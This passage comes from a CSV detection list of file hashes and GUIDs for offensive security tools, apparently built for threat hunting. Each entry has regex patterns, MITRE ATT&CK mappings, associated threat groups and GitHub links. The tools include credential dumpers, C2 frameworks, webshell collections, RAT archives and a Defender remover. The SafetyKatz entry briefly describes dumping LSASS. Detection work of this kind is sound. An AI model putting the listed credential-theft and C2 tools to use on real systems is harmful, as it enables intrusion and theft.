Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24698"
"*37c719615f3d72d457564a3f2af7669fbea6d651b92de213699419a4e8ac27e9*",".{0,1000}37c719615f3d72d457564a3f2af7669fbea6d651b92de213699419a4e8ac27e9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24699"
"*37c8e2bf772fd684c117fbf61f18c99e5d2e7c7a00cd175534e32f9835fb72e3*",".{0,1000}37c8e2bf772fd684c117fbf61f18c99e5d2e7c7a00cd175534e32f9835fb72e3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24700"
"*37d1dfeec72edc0814efec084b8794847d250291eaadf0fbc9b9e2c5602b32ab*",".{0,1000}37d1dfeec72edc0814efec084b8794847d250291eaadf0fbc9b9e2c5602b32ab.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24701"
"*37da8267b295caeca8fadb13206ba1c498a7012673430c5d856fe93862446a28*",".{0,1000}37da8267b295caeca8fadb13206ba1c498a7012673430c5d856fe93862446a28.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#filehash","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","24703"
"*37E20BAF-3577-4CD9-BB39-18675854E255*",".{0,1000}37E20BAF\-3577\-4CD9\-BB39\-18675854E255.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","24705"
"*37e6098a386e8850aba3de35055a38cfd2942cbacf99968da84d85c41c343481*",".{0,1000}37e6098a386e8850aba3de35055a38cfd2942cbacf99968da84d85c41c343481.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24706"
"*37eda44266178cf5b5b932e2dd45c12d65d1379221ed6f77a174d517e3787ba0*",".{0,1000}37eda44266178cf5b5b932e2dd45c12d65d1379221ed6f77a174d517e3787ba0.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24708"
"*37ee54a15c44f222327a9d77243113c2b0efb07451eca2f887d314b6e0963f86*",".{0,1000}37ee54a15c44f222327a9d77243113c2b0efb07451eca2f887d314b6e0963f86.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","24709"
"*37ef8b7afc3687a48d331b98d1e4c350752ad943f58c9aa5a23d4fccb58dd574*",".{0,1000}37ef8b7afc3687a48d331b98d1e4c350752ad943f58c9aa5a23d4fccb58dd574.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24710"
"*37f034844006f3465f1021aa74ba44b8013e1cb31014e4207bbb1e6800cf6bf5*",".{0,1000}37f034844006f3465f1021aa74ba44b8013e1cb31014e4207bbb1e6800cf6bf5.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","24711"
"*37f414a4928417fe375e6ba23c4028681bdfb1dd8d0130b20260caf3a4d33485*",".{0,1000}37f414a4928417fe375e6ba23c4028681bdfb1dd8d0130b20260caf3a4d33485.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24712"
"*37f49e38ee8cc509bcae0842800b3d0c85072d6e56a8395aede48abeef0b9f28*",".{0,1000}37f49e38ee8cc509bcae0842800b3d0c85072d6e56a8395aede48abeef0b9f28.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24713"
"*37fb5ca215c18dea99181660add5055805856ab73254c899860350b0d67cdd8f*",".{0,1000}37fb5ca215c18dea99181660add5055805856ab73254c899860350b0d67cdd8f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24715"
"*37ffc17e18e52704214b980c56fad5a3ee6c9941905a9b76a3c914d82f3d1a61*",".{0,1000}37ffc17e18e52704214b980c56fad5a3ee6c9941905a9b76a3c914d82f3d1a61.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24716"
"*380250752583ba94bf2f4c2b1fef9d9890615099e600b77f01fa0f15f94e3c1c*",".{0,1000}380250752583ba94bf2f4c2b1fef9d9890615099e600b77f01fa0f15f94e3c1c.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","24718"
"*380412e02376173ec8b908679c7f74053cc8199c9ed3138b8b54a6175ddb08d1*",".{0,1000}380412e02376173ec8b908679c7f74053cc8199c9ed3138b8b54a6175ddb08d1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24719"
"*38074409fb6889d1a58cbda706a1167410e4a640630cf128472902a5967074af*",".{0,1000}38074409fb6889d1a58cbda706a1167410e4a640630cf128472902a5967074af.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","24720"
"*3809f2663ab0d7408d98b48c70b1d737d7b9d9b175ad66fb2d4cad8cc636b239*",".{0,1000}3809f2663ab0d7408d98b48c70b1d737d7b9d9b175ad66fb2d4cad8cc636b239.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24721"
"*381135de47985bd9d5079830dae251313b9f08458da9e8185b6253d8e477fd9c*",".{0,1000}381135de47985bd9d5079830dae251313b9f08458da9e8185b6253d8e477fd9c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24724"
"*381448682cb5ea5ff1bc8bfd3462e637da0445fc74fdb60e0de5e11d8c2dc90d*",".{0,1000}381448682cb5ea5ff1bc8bfd3462e637da0445fc74fdb60e0de5e11d8c2dc90d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24725"
"*38189c5fd3ff9946f4498d31e11bb47e49e276e445050f1b9ba9d84b40e55c65*",".{0,1000}38189c5fd3ff9946f4498d31e11bb47e49e276e445050f1b9ba9d84b40e55c65.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24726"
"*382B6332-4A57-458D-96EB-B312688A7604*",".{0,1000}382B6332\-4A57\-458D\-96EB\-B312688A7604.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24728"
"*382c77a7693178867a24912db26b69a1fe5d508cde83ea89309758ef5d001e44*",".{0,1000}382c77a7693178867a24912db26b69a1fe5d508cde83ea89309758ef5d001e44.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","24729"
"*382dbe7341c3b3970dacf304a4de5a6df18fa39cf13d4ca3e4441aa912e100f8*",".{0,1000}382dbe7341c3b3970dacf304a4de5a6df18fa39cf13d4ca3e4441aa912e100f8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24730"
"*383b8dcb968b6bd0633658d9bb55c4acaf4c85a075aa456904a42d4e4efd5561*",".{0,1000}383b8dcb968b6bd0633658d9bb55c4acaf4c85a075aa456904a42d4e4efd5561.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","24731"
"*384218806db2a3031a7582b461084ce83d1646241574f325b0454bffd6c5ae9a*",".{0,1000}384218806db2a3031a7582b461084ce83d1646241574f325b0454bffd6c5ae9a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24733"
"*3843b02a960a6d676a9166a51da80aed18937ea0b582895b6b2780fff58417bd*",".{0,1000}3843b02a960a6d676a9166a51da80aed18937ea0b582895b6b2780fff58417bd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24734"
"*3855e59bb3240198350cfa740f6a568f4f7510e174ec37f08a385dddd31cb0c6*",".{0,1000}3855e59bb3240198350cfa740f6a568f4f7510e174ec37f08a385dddd31cb0c6.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24735"
"*385a076cf8b909062acbb4df72012aee93fce1cd6d1a0b3c12ee7d3f7bc2f464*",".{0,1000}385a076cf8b909062acbb4df72012aee93fce1cd6d1a0b3c12ee7d3f7bc2f464.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","24736"
"*385a18846808ae7f07d1be33dfe8c850736eec33910e1366fdff14bb4384b690*",".{0,1000}385a18846808ae7f07d1be33dfe8c850736eec33910e1366fdff14bb4384b690.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24737"
"*385b94df8c0ad36fe074e09b69c06f427da95958555690ae65a51fd913f5a4ba*",".{0,1000}385b94df8c0ad36fe074e09b69c06f427da95958555690ae65a51fd913f5a4ba.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24738"
"*3864f0d44f90404be0c571ceb6f95bbea6c527bbfb2ec4a2b4f7d92e982e15a2*",".{0,1000}3864f0d44f90404be0c571ceb6f95bbea6c527bbfb2ec4a2b4f7d92e982e15a2.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","24739"
"*38698c9ebb4f24b1b11d2b5c023c72b24c1e68de5bd2bc04384e85a1467e0a00*",".{0,1000}38698c9ebb4f24b1b11d2b5c023c72b24c1e68de5bd2bc04384e85a1467e0a00.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","24740"
"*386b7c0bfd847142ecd41646e39f24f5d8dd18f1f9c897bfcb5c19a2cb4edea9*",".{0,1000}386b7c0bfd847142ecd41646e39f24f5d8dd18f1f9c897bfcb5c19a2cb4edea9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24741"
"*386ca395c1fb8ca41e5371807ffc70f06bf161ddd8a24afb34f0d9132271243e*",".{0,1000}386ca395c1fb8ca41e5371807ffc70f06bf161ddd8a24afb34f0d9132271243e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24742"
"*38707a769a7eb4bd3e4165eaa94d727b33e7a83d974464c5f6a4fb9d6ef7d43f*",".{0,1000}38707a769a7eb4bd3e4165eaa94d727b33e7a83d974464c5f6a4fb9d6ef7d43f.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#filehash","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","24743"
"*387416cccea393e9e9eb2c069edabbf7297226037cc374d9a358ce1020696a5d*",".{0,1000}387416cccea393e9e9eb2c069edabbf7297226037cc374d9a358ce1020696a5d.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","24744"
"*3874c97fddb57971c35e02b68b74709f05ed396c19dceacadf4d9432c5a0206f*",".{0,1000}3874c97fddb57971c35e02b68b74709f05ed396c19dceacadf4d9432c5a0206f.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","24747"
"*38782e6ee72ae26ccbdf20f4179ebeb94ed5c1e9a358dce59ac5e220336ab3c7*",".{0,1000}38782e6ee72ae26ccbdf20f4179ebeb94ed5c1e9a358dce59ac5e220336ab3c7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24749"
"*387930bab7650291baada3b39dc55167c1e6f1fd2154de61f77e07bd14c8b9bc*",".{0,1000}387930bab7650291baada3b39dc55167c1e6f1fd2154de61f77e07bd14c8b9bc.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","#filehash","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","24750"
"*387938818fcc342d03c211123e30922e0d219262a66b988bbe54b6958edfb73b*",".{0,1000}387938818fcc342d03c211123e30922e0d219262a66b988bbe54b6958edfb73b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24751"
"*387e21adbabeddf80db5d2868f93d6bdba8443dc26fdb964ec6e279f3d02310c*",".{0,1000}387e21adbabeddf80db5d2868f93d6bdba8443dc26fdb964ec6e279f3d02310c.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","#filehash","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","24752"
"*3882d5cf0114c24977f1cd1317618c9d8a17647d0f4aaea7818f1f38332ad848*",".{0,1000}3882d5cf0114c24977f1cd1317618c9d8a17647d0f4aaea7818f1f38332ad848.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24754"
